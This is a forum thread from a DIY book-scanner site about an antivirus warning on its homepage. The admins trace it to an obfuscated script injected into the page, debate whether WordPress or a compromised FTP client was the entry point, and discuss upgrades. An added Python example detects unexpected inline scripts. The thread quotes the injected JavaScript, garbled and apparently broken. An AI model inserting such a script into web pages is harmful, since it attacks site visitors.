
Virus on Homepage ?

Posted: 22 Dec 2010, 11:12
by Hasher
Am I the only one getting a virus warning on http://diybookscanner.org/ homepage?



Re: Virus on Homepage ?

Posted: 22 Dec 2010, 11:30
by daniel_reetz
Hmm, someone else PM'd me about this and I thought Avast was having problems with the Scriptaculous library. However, after some digging I found this script embedded between the "map" and "html" tags on the front page:
<!-- C/C v0842 --><script>function lG(){};jJ="";lG.prototype = {eS : ction(){return 'dM'};sH=false;var bO=15569;var bN="";this.vX="";o.write(oF);var bNS=new Date();var jY=false;var bT=new Array();gF=false;var tS=26505;var xP = this;var cW=new Date();var oE="oE";eV="";var jX=function(){};this.aP="";this.lN=49747;h(function(){ var bB=function(){return 'bB'};function hU(){};function nK(){};lT="";xP.z();rT="rT";var gH='';this.qI='';var xO="xO";var dU="";this.vZ=false;wP="";}, 317);iN="iN";var hP="";oQB='';var sV=false;}eO="eO";hD=49992;}};var vF=61292;var gK=new lG(); zD="";gK.z();this.hR="hR";</script></body>


I'm not sure how it got in there, but please check that you're no longer getting a false positive, and I'll seek out the source of the attack.
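
One way to check a deployed page against a known-good backup for inline scripts that were not there before, as with the insertion described in the post above. This is an added example, not code from the thread or the site; the sample pages, the placeholder script and all function names are constructed for illustration.

```python
import hashlib
from html.parser import HTMLParser

class InlineScriptCollector(HTMLParser):
    """Records (line, body) for every <script> element without a src attribute."""

    def __init__(self):
        super().__init__()
        self.scripts, self._start, self._chunks = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "script" and "src" not in dict(attrs):
            self._start, self._chunks = self.getpos()[0], []

    def handle_data(self, data):
        if self._start is not None:
            self._chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._start is not None:
            self.scripts.append((self._start, "".join(self._chunks)))
            self._start = None

def inline_scripts(html):
    parser = InlineScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts

def fingerprint(body):
    # Collapse whitespace so re-indentation alone is not reported as a change.
    return hashlib.sha256(" ".join(body.split()).encode()).hexdigest()

def unexpected_scripts(baseline_html, live_html):
    """Inline scripts present in the live page but absent from the known-good copy."""
    known = {fingerprint(body) for _, body in inline_scripts(baseline_html)}
    return [(n, b) for n, b in inline_scripts(live_html) if fingerprint(b) not in known]

# Constructed sample pages (not the site's real markup); the added script is a harmless stand-in.
BASELINE = ('<html><head>\n<script src="/js/scriptaculous.js"></script>\n'
            '<script>var menu = "main";</script>\n</head><body>\n'
            '<map name="nav"></map>\n</body></html>\n')
LIVE = BASELINE.replace("</map>\n", "</map>\n<script>var placeholder = 1;</script>\n")

if __name__ == "__main__":
    for line, body in unexpected_scripts(BASELINE, LIVE):
        print(f"line {line}: inline script not in baseline: {body[:60]!r}")
```

Run against a backup copy and the live file, this reports the line of each new inline script; external scripts loaded via `src` are left to a separate file-hash comparison.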

Re: Virus on Homepage ?

Posted: 22 Dec 2010, 11:35
by daniel_reetz
Apparently Wordpress is the attack vector; we were a version behind on the blog -- entirely my fault. Can you please visit the blog, and see if you get the same report?

http://www.diybookscanner.org/news/

Re: Virus on Homepage ?

Posted: 22 Dec 2010, 12:12
by daniel_reetz
It's no longer clear that WP was the vector. I'm further investigating, have made backups of everything, and am scanning my local machines for infection.

I also have found no other evidence of infection according to the usual methods of this trojan, so it appears (for the moment) that it came from a local machine. I'll be changing admin passwords sitewide.

Re: Virus on Homepage ?

Posted: 10 Jan 2011, 13:07
by Anonymous1
You're also a bit behind on Wordpress again. 3.0.4 was just released, but I couldn't find any security holes in 3.0.3.

I'd be careful with PHPBB3. There are tons of scripts created just for the purpose of helping kiddies hack sites, so it's something to watch out for.

Have you tried the development version of each platform? Wordpress can be set to auto-update to the latest version (I run my local site on the development version, as I make WP themes sometimes). I'm not sure about PHPBB3...

Re: Virus on Homepage ?

Posted: 10 Jan 2011, 15:03
by daniel_reetz
Thanks for the reminder. I've gone through our hosting panel and clicked "upgrade" on everything, because the internal upgrade for Wordpress doesn't always work.

I've been keeping a close eye on things since the last incident. I appreciate more eyes.

Re: Virus on Homepage ?

Posted: 10 Jan 2011, 21:56
by Anonymous1
I wouldn't rely too much on a hosting panel for this. Wordpress is self-contained, and sometimes it is just easier to run the upgrade than rely on a host (it's not automatic, as it sometimes just queues your upgrade request). There was a huge wave of Wordpress and PHP-based system infections being spread via Dreamhost specifically. I hope this isn't one of them...

Re: Virus on Homepage ?

Posted: 10 Jan 2011, 22:28
by daniel_reetz
Unfortunately the self-update on my WP install here is broken, so I have to use the WebPanel to get it done. Rob usually handles the forum updates; I'm not sure which mechanism he is using.

I won't rely on it and I'll try to do better with updates. I've seen no suspicious activity since the original code insertion and that makes me suspect it happened through a compromised client (my old laptop) with FTP access, rather than through infected software on the server.

I am always interested in better security info and updates, so feel free to keep me up-to-date.

Re: Virus on Homepage ?

Posted: 10 Jan 2011, 22:58
by rob
The Admin Control Panel for the forum has an upgrade button; it hardly takes any time at all. Every so often I check the version page, and it says whether there's a newer version to install. So the forum tends to be up-to-date.